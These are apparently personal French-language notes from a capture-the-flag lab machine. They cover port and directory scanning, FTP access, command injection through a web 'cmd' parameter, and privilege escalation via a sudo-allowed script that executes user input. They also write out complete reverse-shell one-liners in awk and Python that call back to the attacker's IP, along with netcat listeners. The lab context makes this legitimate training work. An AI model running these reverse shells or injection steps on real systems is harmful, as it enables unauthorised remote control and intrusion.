
ip machine a attaqueé : 10.10.113.141

ping 10.10.113.141
=> notre vm connecté a celle a attaqué

nmap -vv 10.10.113.141 -p-
=> regarder quelles port ouvert
=> 80, 22, 21
=> site internet sur http://10.10.113.141
=> voir si connection ftp possible

ftp connection 
recv .nomes

cat nomes
You find a nome hidding around, you hug it... You feel a little bit relieved!


gobuster dir -u http://10.10.1113.141 -w Desktop/wordlists/dirb/common.txt
=> vérifier les redirection de la page internet
=> css/ et images/
=> gobuster dir -u http://10.10.1113.141/css -w Desktop/wordlists/dirb/common.txt & gobuster dir -u http://10.10.1113.141/images -w Desktop/wordlists/dirb/common.txt aucun résultat
=> rien dans les pages web

gobuster dir -u http://10.10.164.95 -w SecLists-master/Discovery/Web-Content/directory-list-2.3-big.txt
=>route /discrete find

utiles burp
cmd=dir
cmd=grep "" index.php
cmd = sudo -l
Matching Defaults entries for www-data on the-maw:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on the-maw:
    (six) NOPASSWD: /home/six/.musicbox
cmd=cd+/home/six+%26%26+grep+''+.musicbox

#!/bin/bash

echo
echo " ♩♪♪♫♫♬♫♬♬♪♪♬♫♩ "
echo

read -p "Stop the box ? (y/n): " rep

echo "You entered $rep"; $rep 2>/dev/null

echo "It didn't worked..."

dans shell 1
    nc -lvnp 1234
dans site web => reverse shell avec awk(ip machine kali et un port)
    awk 'BEGIN {s = "/inet/tcp/0/10.10.255.99/1234"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

dans shell 2
    nc -lvnp 2345
dans shell 1: (pour avoir un shell propre)
    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.69.242",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

dans shell 2:
    sudo -l
    sudo -u six /home/six/.musicbox
    taper la commande qu'on veux dans y/n : /bin/bash
 
dans shell 3:
    nc -lvnp 1236

dans shell 2:
    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.69.242",1236));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
  
on peut taper les commandes qu'on veux sans trop de restrictions dans le shell n°3
on essaye d'aller dans /home/six : cd /home/six
===> user.txt
cat user.txt
===>EPI{I_MuS7_F1nD_@_W4y_0Ut}

idée pour la suite:
sur notre machine faire un serveur python, connecté la machine a attaqué dessus pour pouvoir transféré des fichires
